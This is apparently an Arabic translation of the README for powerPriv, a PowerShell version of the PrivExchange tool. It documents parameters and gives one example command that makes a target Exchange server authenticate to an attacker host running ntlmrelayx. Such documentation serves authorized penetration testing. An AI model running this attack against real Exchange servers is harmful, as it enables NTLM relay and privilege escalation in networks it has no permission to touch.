
تطبيق باورشيل لأداة PrivExchange مصمم للتشغيل في سياق المستخدم الحالي
تطبيق بلغة PowerShell لأداة PrivExchange من @_dirkjan (الكود الأصلي موجود هنا: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) مفيد في البيئات التي لا يمكن فيها تشغيل التطبيقات المبنية على Python، أو تتوفر لديك بيانات اعتماد مستخدم، أو لا تريد حفظ ملفات على القرص. سيؤدي إلى محاولة حساب النظام الخاص بخادم Exchange الهدف المصادقة على نظام من اختيارك.
-targetHostاسم المضيف أو عنوان IP لصندوق Exchange الهدف. بناءً على إعدادات DNS، قد يتطلب اسمًا مؤهلًا بالكامل إذا تم استخدام اسم المضيف. (مطلوب)
-attackerHostاسم المضيف أو عنوان IP لنظام تتحكم أنت به، ويفضل أن يكون ntlmrelayx قيد التشغيل عليه. نحن نخبر خادم Exchange بمحاولة المصادقة على هذا النظام. بناءً على إعدادات DNS، قد يتطلب اسمًا مؤهلًا بالكامل إذا تم استخدام اسم المضيف. (مطلوب)
-exchangePortالمنفذ المستخدم للاتصال بخادم Exchange. القيمة الافتراضية هي 443.
-attackerPortالمنفذ الذي يجب أن يحاول Exchange الاتصال من خلاله مرة أخرى إلى المهاجم. القيمة الافتراضية هي 80
-attackerPageالصفحة التي نخبر خادم Exchange بالاتصال بها على نظام الهجوم الخاص بنا. ليست هناك حاجة إلى الشرط المائلة. القيمة الافتراضية هي powerPriv.
-noSSLاضبط على true إذا كنت لا تريد استخدام https للاتصال الأولي بخادم Exchange. القيمة الافتراضية هي false (استخدم https).
-Versionإصدار خادم Exchange الذي نستهدفه. القيمة الافتراضية هي 2013.
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
المؤلف: @g0ldenGunSec - بناءً على الأداة التي أنشأها @_dirkjan
استخدم هذه الأداة فقط على الشبكات التي تمتلكها أو لديك إذن لاختبارها.